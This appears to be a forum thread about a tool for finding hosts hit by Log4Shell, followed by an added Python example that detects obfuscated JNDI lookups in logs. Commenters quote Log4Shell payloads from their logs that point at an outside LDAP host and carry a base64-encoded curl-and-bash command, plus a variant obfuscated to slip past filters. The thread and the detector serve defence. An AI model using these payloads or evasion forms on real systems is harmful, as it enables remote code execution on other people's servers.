item 29533252
Our new tool for enumerating hidden Log4Shell-affected hosts
22 points | dnet | 4 years ago | blog.silentsignal.eu
3 comments

elric|4 years ago
We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:
> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<base64 encoded call to curl & bash>
Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

bArray|4 years ago
Can confirm this also:
${jndi:ldap://45.155.205.xxx:12344/Basic/Command/Base64/<base64>}
> Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.
Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/<base64>
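
The filtering problem raised in the comment above, as an added example that is not part of the thread or any commenter's code: a literal `${jndi:` match misses the nested `${::-j}` form, so this Python log check resolves `${name:-default}` expressions from the inside out before matching. Function names and the sample lines are constructed for illustration; only the `:-` default form and percent-encoding are handled, and any other lookup is left untouched.

```python
import re
from urllib.parse import unquote

# A ${...} expression that contains no nested ${...}.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def _resolve(match):
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)          # keep it so the caller can flag it
    if ":-" in body:                   # ${name:-default} falls back to default
        return body.split(":-", 1)[1]
    return match.group(0)              # any other lookup is left untouched

def normalize(line, max_rounds=10):
    """Percent-decode, then collapse ${...:-x} defaults from the inside out."""
    text = unquote(line)
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text

def naive_filter(line):
    """The literal substring match an ingress rule might start with."""
    return "${jndi:" in line

def looks_like_jndi_lookup(line):
    return bool(JNDI.search(normalize(line)))

# Constructed log lines (192.0.2.0/24 is a documentation range).
SAMPLES = [
    "GET /?x=${jndi:ldap://192.0.2.10:1389/a} HTTP/1.1",
    "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}"
    "://192.0.2.10:1389/a} HTTP/1.1",
    "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi:ldap://192.0.2.10/a%7D HTTP/1.1",
    "GET /search?q=${name:-guest} HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(naive_filter(line), looks_like_jndi_lookup(line), normalize(line))
```

The second and third sample lines pass the naive substring filter but are flagged after normalization, while the benign `${name:-guest}` line is not.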